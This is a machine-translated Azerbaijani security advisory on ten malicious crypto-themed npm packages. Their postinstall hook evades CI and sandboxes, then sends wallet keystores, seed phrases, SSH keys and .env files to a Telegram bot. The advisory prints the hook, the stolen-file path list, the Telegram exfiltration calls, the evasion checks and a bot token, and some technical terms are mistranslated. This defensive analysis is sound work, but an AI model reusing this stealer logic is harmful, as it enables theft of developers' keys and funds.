SeedSweep: On Zərərli npm Kripto Paketi

SeedSweep: Yalnız Heç Kim İzləmədikdə İşləyən On Kriptovalyuta Temalı NPM Paketi

TL; DR

9 iyun 2026-cı ildə tək bir npm naşir hesabı, aicrypto-xzggg, göndərilib on paket kripto və Web3 dadlı adlarla — farming-tools-12, swap-sdk-87, defi-tools-39, wallet-sdk-9və daha altı.

Hər paket eyni yükü birdən işə salır postinstall qarmaq. Quraşdırma zamanı, CI daxilində və ya sandbox daxilində işlədiyini yoxlayır — əgər işləmirsə, cüzdan açar anbarlarını, toxum ifadəsi fayllarını, SSH açarlarını və s. oxuyur. .env altı blokçeyn ekosistemindən faylları yükləyir və onları Telegram botuna ötürür.

Müdafiəçinin dərhal axtara biləcəyi tək göstərici Telegram bot identifikatorudur 8227918239.

Şiddəti: tənqidi — imza açarlarının və bərpa ifadələrinin birbaşa oğurlanması geliştirici iş stansiyaları.

Hücum: Necə İşləyir

Paketlər özlərini blokçeyn geliştirici yardımçı proqramları kimi reklam edirlər. paket.json minimaldır və quraşdırma həyat dövrünü skriptə yönəldir:

{   "name": "farming-tools-12",   "main": "src/index.js",   "scripts": { "postinstall": "node scripts/postinstall.js" },   "keywords": ["web3", "crypto", "blockchain", "solana", "ethereum"],   "author": "Alex Smith",   "license": "MIT" }

skriptlər/postinstall.js əsl yükü yükləyən tək xətli bir şimdir: tələb edir(“../src/index.js”). Çünki quraşdırma sonrası ərzində avtomatik olaraq işləyir npm yükləyin, geliştirici tərəfindən kod idxalı tələb olunmur — paketi asılılıq ağacına yerləşdirmək onu icra etmək üçün kifayətdir.

İçəridəki öldürücü zənciri src/index.js dörd addımdan ibarətdir:

  1. Ətraf mühit yoxlaması. Mühafizə funksiyası, hostun quruluş agenti və ya analiz sandboxu kimi göründüyünə qərar verir.
  2. Gecikmə. İcra təxirə salınıb vaxtaşırı təyin etmək təxminən 7.4 saniyə.
  3. Kolleksiya. Cüzdan, açar və gizli fayl yollarının sabit siyahısı gəzilir; mövcud fayllar növbəyə düzülür.
  4. Eksfiltrasiya. Növbədə olan fayllar Telegram botuna göndərilir və bundan əvvəl xülasə mesajı verilir.

Kolleksiya hədəf siyahısı altı zəncir və ümumi geliştirici sirlərini əhatə edir. Kəsilmiş:

~/.config/solana/id.json        ~/.ethereum/keystore ~/.solana/keypair.json          ~/.bitcoin/wallet.dat ~/.tron_wallet/keystore         ~/.sui/sui_config/sui.keystore ~/.aptos/key.txt                ~/.ssh/id_rsa , ~/.ssh/id_ed25519 ./wallet.json  ./keystore.json  ./mnemonic.txt  ./seed.txt ./seedphrase.txt  ./recovery.txt  ./private.key  ./.env  ./.env.local

Cəmi iyirmi bir yol. Kataloq girişləri, məsələn ~/.ethereum/açar mağazası genişləndirilir və içindəki hər bir fayl növbəyə qoyulur. Eksfiltrasiya birbaşa Telegram Bot API-dən istifadə edir — a Mesaj göndər ana və fayl xülasəsi ilə zəng edin, sonra isə Sənəd göndər hər fayl üçün çox hissəli yükləmə:

mətn

POST https://api.telegram.org/bot<token>/sendMessage POST https://api.telegram.org/bot<token>/sendDocument   (one per file)

Kodun yığdığı xülasə mesajı hərfi sətirlə başlayır KRIPTO OĞURLUĞU, ardınca host adı, istifadəçi adı, mənbə paket adı, fayl sayı və zaman möhürü gəlir.

Burada yeniliklər var

Fərqləndirici oğurluq mexanizmi deyil — npm-dən Telegram əsaslı exfil quraşdırma sonrası hooks yaxşı tapdalanmışdır. Bu icra qapısı. Hər hansı bir hərəkət etməzdən əvvəl, faydalı yük, host CI runner və ya sandbox kimi göründüyü zaman true qaytaran və etdikdə erkən qaytaran bir funksiya çağırır:

mətn

isTestEnvironment() is true when ANY of:   - env CI == "true"  OR  GITHUB_ACTIONS == "true"  OR  JENKINS_HOME set   - env NODE_ENV in {test, development}   - username/USER contains: runner, sandbox, test, docker,     jenkins, gitlab, travis, circleci   - hostname contains: sandbox, test, ci   - hostname matches /^[a-f0-9]{12}$/   (a container-id shape)

Konteyner id regex-i diqqətəlayiq bənddir: 12 hex simvollu host adı Docker-in təyin etdiyi standart formadır konteyner, beləliklə, faydalı yük "mənim host adım Docker konteynerinə oxşayır" ifadəsini hərəkətsiz qalma səbəbi kimi qəbul edir. Yeddi saniyəlik gecikmə ilə birlikdə dizayn, geliştiricinin real iş stansiyasında işləməyi və avtomatlaşdırılmış analiz kimi görünən hər yerdə səssiz qalmağı üstün tutur. Bu qapı dinamik analiz siqnallarını basdıran və statik exfil axınını əsas məhkumluq sübutu kimi saxlayan şeydir.

İş qrafiki

Tarix (UTC) hadisə
2026-06-09 ~02:48 Klasterdəki ilk paketlər dərc edildikdə işarələndi (crypto-utils-7, ethereum-kit-1, web3-tools-9, solana-core-4, blockchain-helper-0)
2026-06-09 ~03:21–03:25 Daha yüksək versiyalı üzvlər işarələndi (ethereum-kit-9 1.25.36-da, wallet-sdk-9 3.7.73)
2026-06-09 ~03:58–03:59 Son üzvlər qeyd edildi (defi-tools-39 4.26.29-da, swap-sdk-87 4.63.78-da, farming-tools-12 4.68.54)
2026-06-09 Bütün on zərərli maddə zərərli hesab olunur və reyestrdən silinməsi üçün bildirilir

Bütün on film təxminən yetmiş dəqiqə ərzində üzə çıxdı və bu da bir hesabdan tək bir ssenari ilə nəşr olundu.

Kompromis göstəriciləri

Şəbəkə və davranış göstəriciləri (host defanged):

Göstərici Dəyər
Exfil son nöqtəsi api[.]telegram[.]org (Telegram Bot API)
Telegram bot identifikatoru 8227918239
Bot tokeni 8227918239:AAGEMDrBZluDsBBYPxfSyMuv2l3FY8cZCcs
Telegram söhbət identifikatoru 6433587894
Qarmağı quraşdırın postinstallscripts/postinstall.jssrc/index.js
Marker sətri CRYPTO STEALER yığılmış xülasə mesajında
naşir aicrypto-xzggg (qeyd olunan elektron poçt vipsyria88@gmail[.]com, təsdiqlənməmiş)

Hər biri SHA-256 ilə təchiz olunmuş paketlər və versiyalar src/index.js Faydalı yük (faydalı yüklər funksional olaraq eynidir və yalnız daxil edilmiş paket adı etiketində fərqlənir, buna görə də hər heş fərqlidir):

html
Paketi Versiya src/index.js-in SHA-256-sı
farming-tools-12 4.68.54 b50403be9dd9f94f7af4795c1e346c9d27d5a18041a3044773238c4cdc1f4de4
swap-sdk-87 4.63.78 9d96f8759e8d593b6dd2338aceb08cdb12e9a5613700953e04e66cc8c2e3087c
defi-tools-39 4.26.29 ddc5011b6173a57bc7f29b010ed6b71551dee253b5d05d3efc78d076f5351fee
wallet-sdk-9 3.7.73 ef4459281c64f1fe8923d703d416f04080ff1a2b7b385366f46d7cdb25731502
ethereum-kit-9 1.25.36 c43afad949027040c6414d26fa4eea6e2671d2572f9df7fd595e12baf204854f
ethereum-kit-1 1.0.0 1147f5227f3b13f65a438b31d87766c33affc65b7734a8658c95e0a4be1d2381
solana-core-4 1.0.0 93c65f971137d2753b5c57b685471bf5319bdc357fa863de56cbed8447cf576d
web3-tools-9 1.0.0 db97070bd349503f5703404493fc925448c2308c86708b33786309ebe6446a3d
crypto-utils-7 1.0.0 59f2fb112d6f17102fb4a70c8d12bfcbc93e9f0d170fe4451bad1aa4d5d74c92
blockchain-helper-0 1.0.0 053eb318980439d76eecac9847ae31ecf59654cf75ddcfebbdd9ce64bb98a0db

Sadə bir axtarış sorğusu: on adın hər hansı biri üçün quraşdırma qeydlərini və kilid fayllarını axtarın və başqa cür istifadə etməyən build və ya geliştirici hostlarından Telegram Bot API-yə bağlantılar üçün çıxış trafikini axtarın.

Atribut və Müşahidə Edilən Davranış

On paketin hamısı bir hesab tərəfindən dərc edilib, aicrypto-xzggg, göstərilən elektron poçt ünvanı vipsyria88@gmail[.]comHəm e-poçt, həm də mənbəyə nəzarət linki reyestr metaməlumatlarında təsdiqlənməyib və hesabın nüfuzu çox mənfidir. Hesabı kimin idarə etdiyini təsdiqləməmişik.

Hər hansı şəxsiyyət iddiasından iki detalı ayırmaq lazımdır. Birincisi, paket.json müəllif sahə oxumaları Alex Smith hər paketdə, faktiki nəşriyyat hesabı isə aicrypto-xzggg; müəllif sahəsi öz-özünə elan edilmiş metaməlumatlardır və müəllifliyi müəyyən etmir. İkincisi, versiya nömrələri çox dəyişir — bəzi üzvlər burada otururlar 1.0.0, digərləri 4.68.54 — bu, real buraxılış tarixçələrini saxlamaq əvəzinə, yeni hazırlanmış paket adları arasında tək bir faydalı yükün təkrar istifadəsi ilə uyğundur.

Davranış klaster üzrə vahiddir: eyni hədəf yolu siyahısı, eyni Telegram bot identifikatoru və çat identifikatoru, eyni mühit qapısı, eyni KRIPTO OĞURLUĞU marker. Bu vahidlik paketlər arasında ən güclü əlaqədir. Bu, eyni operator siqnalıdır, eynilik deyil.

Müdafiəçilər üçün təsir, tendensiyalar və rəhbərlik

Ekspozisiya konkretdir. Bu paketlərdən hər hansı birini proqram təminatı cüzdanı, toxum ifadəsi faylı və ya SSH açarı saxlayan iş stansiyasına quraşdıran bir geliştirici, həmin faylları saniyələr ərzində oxuyub hostdan ötürür. Bərpa ifadələri və imza açarları sessiya tokeninin müddəti bitmir; bir dəfə mnemonic.txt və ya Solana id.json Maşını tərk etdikdə, onun idarə etdiyi vəsaitlər hərəkət etdirilənə qədər risk altında qalır. Eyni qaçış da ələ keçirir .NS müntəzəm olaraq API açarlarını və verilənlər bazası etimadnaməsini daşıyan fayllar.

Bu klasterin arxasında iki trend dayanır. Birincisi, müəyyən bir auditoriyaya - cüzdanları və açarları quraşdırdıqları eyni maşında saxlayan tərtibatçılara müraciət etmək üçün kripto və Web3 temalı adların davamlı istifadəsidir. İkincisi, quraşdırma vaxtı yüklənmələrində sandbox yayınmasının yetkinləşməsidir. CI mühit dəyişənlərini, çalışan istifadəçi adlarını və Docker konteyner id host adı formasını yoxlayan bir qapı, təhlil altında real iş stansiyasından fərqli davranmaq üçün qəsdən edilən bir səydir və sırf dinamik aşkarlama üçün standartları artırır.

Müdafiəçilər üçün:

Varsayılan olaraq skriptlər deaktiv edilmiş şəkildə quraşdırın. npm quraşdırma –ignore-scripts, və ya təyin edin ignore-scripts=true in .npmrc, qarşısını alır quraşdırma sonrası icra; skriptləri yalnız həqiqətən ehtiyac duyduqları xüsusi asılılıqlar üçün aktivləşdirin.

Cüzdanları və imza açarlarını qurma və inkişaf etdirmə maşınlarından kənarda saxlayın. Avadanlıq cüzdanı və ya xüsusi, asılılıqsız imza hostundan istifadə edin.

Müalicə etmək .NS, açar saxlama yerləri və toxum ifadəsi faylları tac daşları kimi. Onlar heç vaxt eyni zamanda bir qovluqda yerləşməməlidirlər. npm yükləyin işləyən ağac.

CI və geliştirici hostlarından Telegram Bot API-yə çıxış bağlantıları axtarın. Əksər qurma mühitləri heç vaxt bunu çağırmır; quraşdırmadan dərhal sonra qəfildən açılan mühit araşdırmağa dəyər.

Asılılıqları bağlayın və nəzərdən keçirin. Ümumi kripto adı olan yeni bir paket, a quraşdırma sonrası hook və heç bir depo bağlantısı kilid faylına daxil olmadan əvvəl baxmağa ehtiyac duymur.

Container-id yayınma bəndi analitiklər üçün də bir xatırlatmadır: sandbox-da hərəkətsiz qalan quraşdırma vaxtı faydalı yükü zərərsiz deyil, seçicidir. Quraşdırma yolunun statik nəzərdən keçirilməsi dinamik icranın nəyi göstərməkdən imtina edə biləcəyini görmək üçün etibarlı bir yol olaraq qalır.

References

npm quraşdırma sənədləri — həyat dövrü skriptləri və –ignore-scripts— avtomatik quraşdırmanı deaktiv etmək üçün istinad hooks. 

sca-tools-proqram-kompozisiya-analiz-alətləri
Proqram təminatı risklərinizi prioritetləşdirin, aradan qaldırın və təhlükəsizləşdirin
Pulsuz Hesabınızı əldə edin.
Kredit kartı tələb olunmur.

Proqram təminatınızın hazırlanması və çatdırılmasını təmin edin

Xygeni Məhsul Dəsti ilə